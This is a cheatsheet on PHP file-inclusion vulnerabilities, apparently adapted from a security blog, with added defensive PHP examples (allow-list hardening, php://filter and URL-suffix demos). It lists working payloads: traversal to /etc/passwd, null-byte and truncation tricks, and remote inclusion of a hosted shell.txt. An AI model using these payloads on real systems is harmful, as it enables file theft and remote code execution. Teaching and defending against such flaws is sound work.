This article briefly walks through the vulnerabilities that arise when a PHP script passes user-controlled input to include(). I hope it will be of some use to you.
Basic local file inclusion:
The Code is as follows:
<?php include("des/" . $_GET['file']); ?>
* Files in the same directory: ?file=.htaccess
* Path traversal: ?file=../../../../../../../../var/lib/locate.db (this file is interesting because it lets you search the filesystem for other files; "../" segments beyond the root are ignored, so using more than you need is harmless)
* Files containing injected PHP code: ?file=../../../../../../../../var/log/apache/error.log (the Apache log directory varies by distribution; think about every file an attacker can write to: log files, file uploads, session files, etc.)
Restricted local file inclusion:
The Code is as follows:
<?php include("des/" . $_GET['file'] . ".htm"); ?>
Here the script appends a fixed suffix, so plain traversal only reaches files ending in ".htm". Each of the following tricks strips that suffix:
* Null byte injection: ?file=../../../../../../../../etc/passwd%00 (requires magic_quotes_gpc=off; PHP 5.3.4 and later reject paths containing a null byte, so this only works on older versions)
* Directory listing via null byte injection: ?file=../../../../../../../../var/www/accounts/%00 (BSD only; requires magic_quotes_gpc=off)
* Path truncation: ?file=../../../../../../../../etc/passwd/././././. ... (pad the path until it exceeds the platform's maximum path length, 4096 bytes on Linux, so the appended ".htm" falls off the end; no longer works on current PHP, it was fixed in the 5.3 line)
* Dot truncation: ?file=../../../../../../../../etc/passwd................ (Windows only: trailing dots are removed during path normalisation and the long name pushes the suffix past the length limit)
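The two local-inclusion patterns above, as an added example that is not part of the original post: the vulnerable include next to a hardened version that resolves a request key through an allow-list and then verifies the canonical path still lies inside the intended directory. The directory name "des/" and the ".htm" suffix follow the page; the template names, the scratch directory and the probe strings are constructed for the demo.

```php
<?php
// Added example (not from the original cheatsheet). "des/" and ".htm" follow the page;
// the allow-list entries and the scratch directory are assumptions for the demo.

// Vulnerable pattern from the page, shown for contrast only (never deploy this):
// the attacker controls the middle of the path, "../" walks out of des/, and
// "%00" (PHP < 5.3.4) or path/dot truncation strips the ".htm" suffix.
function include_vulnerable(string $file): void
{
    include("des/" . $file . ".htm");
}

// Hardened: the request selects a key, never a path.
const TEMPLATES = [
    'home'    => 'home.htm',
    'about'   => 'about.htm',
    'contact' => 'contact.htm',
];

// Returns the canonical path to include, or null if the request must be refused.
function resolve_template(string $key, string $baseDir): ?string
{
    // 1. Exact allow-list match. "../", "%00", "php://" etc. never match a key.
    if (!isset(TEMPLATES[$key])) {
        return null;
    }
    // 2. Canonicalise both ends and require the file to sit under $baseDir.
    //    This catches a symlink planted inside des/ that points elsewhere.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . TEMPLATES[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function include_hardened(string $key, string $baseDir): void
{
    $path = resolve_template($key, $baseDir);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// Demo setup (constructed): a scratch des/ directory holding one real template.
$des = sys_get_temp_dir() . '/des_' . getmypid();
mkdir($des);
file_put_contents($des . '/home.htm', "<h1>home</h1>\n");

// The requests the cheatsheet payloads would produce, plus the legitimate one.
$probes = [
    'home',
    '../../../../etc/passwd',
    "../../../../etc/passwd\0",
    'php://filter/convert.base64-encode/resource=index.php',
];
foreach ($probes as $probe) {
    printf("%-60s -> %s\n",
        addcslashes($probe, "\0"),
        resolve_template($probe, $des) ?? 'rejected');
}

include_hardened('home', $des);   // prints the template
include_hardened('../x', $des);   // 404, nothing included

unlink($des . '/home.htm');
rmdir($des);
```

Run it with the PHP CLI; only the "home" probe resolves, every traversal, null-byte and wrapper probe is rejected before include() ever sees it. The realpath check is deliberately kept even though the allow-list already blocks the payloads: it is the layer that still holds if someone later replaces the fixed array with a directory scan.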
Basic remote file inclusion:
The Code is as follows:
<?php include($_GET['file']); ?>
* Including remote code: ?file=[http|https|ftp]://websec.wordpress.com/shell.txt (requires allow_url_fopen=On and allow_url_include=On)
* Using the PHP stream php://input: ?file=php://input (put your payload in the POST body and watch the URL encoding; requires allow_url_include=On)
* Using the PHP stream php://filter: ?file=php://filter/convert.base64-encode/resource=index.php (lets you read PHP source: the base64 output contains no PHP tags, so it is printed instead of evaluated. php://filter is a local stream, so this works even with allow_url_include=Off)
* Using data URIs: ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= (requires allow_url_include=On; the example decodes to "I love PHP")
* Using XSS: ?file=http://127.0.0.1/path/xss.php?xss=phpcode (makes sense when outbound requests are firewalled or only whitelisted domains are allowed: the reflected parameter is what gets fetched and included)
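What the php://filter payload above actually yields, as an added example that is not part of the original post. The script writes a constructed config file, includes it once through the base64 filter (which is what the vulnerable include($_GET['file']) does with that payload) and once directly, so the difference between "source leaked" and "code executed" is visible. The file name and its contents are made up for the demo.

```php
<?php
// Added example (not from the original post). Demonstrates the php://filter
// source-disclosure trick against a constructed target file.

$target = sys_get_temp_dir() . '/config_' . getmypid() . '.php';
file_put_contents($target, "<?php\n\$dbPass = 'hunter2';\n");

// The payload the page shows, with the constructed file as the resource:
// ?file=php://filter/convert.base64-encode/resource=<target>
$payload = 'php://filter/convert.base64-encode/resource=' . $target;

// include() reads the stream through the filter. The result is base64 text with no
// "<?php" tag, so PHP treats it as inline HTML and simply echoes it.
ob_start();
include $payload;
$leaked = ob_get_clean();

echo "Included output: $leaked\n";
echo "Decoded source:\n" . base64_decode($leaked);

// The read-only functions return the same bytes. php://filter is a local wrapper,
// so neither path depends on allow_url_include.
$again = file_get_contents($payload);
assert($again === $leaked);

// Contrast: a plain include executes the file; the secret is assigned, not printed.
ob_start();
include $target;
$executed = ob_get_clean();
echo "Plain include printed: " . var_export($executed, true) . "\n";
echo "dbPass is now set in this scope: " . var_export(isset($dbPass), true) . "\n";

unlink($target);
```

The base64 step matters because including index.php directly would run it and show only its normal output; the filter turns the same include() into a file read. Any wrapper that transforms a local file without producing PHP tags has the same effect, which is why the hardened pattern refuses anything that is not an allow-listed key rather than trying to block individual wrappers.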
Restricted remote file inclusion:
The Code is as follows:
<?php include($_GET['file'] . ".htm"); ?>
Again a fixed suffix is appended, but in a URL the suffix can be pushed into a part of the request that the remote server ignores:
* ?file=http://websec.wordpress.com/shell (the attacker simply hosts the payload as shell.htm)
* ?file=http://websec.wordpress.com/shell.txt? (the suffix becomes the query string "?.htm", which a static file server ignores)
* ?file=http://websec.wordpress.com/shell.txt%23 (%23 is decoded to "#" before concatenation, so the suffix becomes the fragment and is never sent to the server)
(requires allow_url_fopen=On and allow_url_include=On)
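Why the three payloads above survive the suffix, as an added example that is not part of the original post: the script concatenates ".htm" the way the vulnerable include does and uses parse_url() to show which part of the URL the suffix lands in. PHP decodes $_GET before the concatenation, which is why the "%23" variant is passed through urldecode() here. The host is the one used in the cheatsheet; nothing is fetched from it.

```php
<?php
// Added example (not from the original post). Shows where the appended ".htm"
// ends up for each restricted-RFI payload. No network access is performed.

function split_request(string $fileParam, string $suffix = '.htm'): array
{
    $url = $fileParam . $suffix;          // what include() actually receives
    $u = parse_url($url);
    return [
        'url'      => $url,
        'path'     => $u['path'] ?? '',    // the only part a static server uses to pick a file
        'query'    => $u['query'] ?? null, // sent, but ignored for a static file
        'fragment' => $u['fragment'] ?? null, // never leaves the client
    ];
}

// The three payloads from the page. $_GET is already URL-decoded, so "%23" arrives as "#".
$payloads = [
    'http://websec.wordpress.com/shell',                   // attacker hosts shell.htm
    'http://websec.wordpress.com/shell.txt?',              // suffix -> query string
    urldecode('http://websec.wordpress.com/shell.txt%23'), // suffix -> fragment
];

foreach ($payloads as $p) {
    $r = split_request($p);
    printf("%-45s fetches %-12s query=%-6s fragment=%s\n",
        $r['url'],
        $r['path'],
        var_export($r['query'], true),
        var_export($r['fragment'], true));
}
```

The first case needs cooperation from the attacker's server (serve the payload under the expected name); the other two work against any server because the path component is already complete before the "?" or "#". The same split is why a suffix never constrains a remote include the way it constrains a local one.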
Static remote file inclusion:
The Code is as follows:
<?php include("http://192.168.1.10/config.php"); ?>
* Man in the middle (lame indeed, but often forgotten): the file is fetched over plain HTTP from a fixed host on every request, so anyone who can intercept or spoof traffic to 192.168.1.10 serves their own config.php and it is executed by the application.
From Reiners' weblog (websec.wordpress.com), where the original post links to further details for each technique.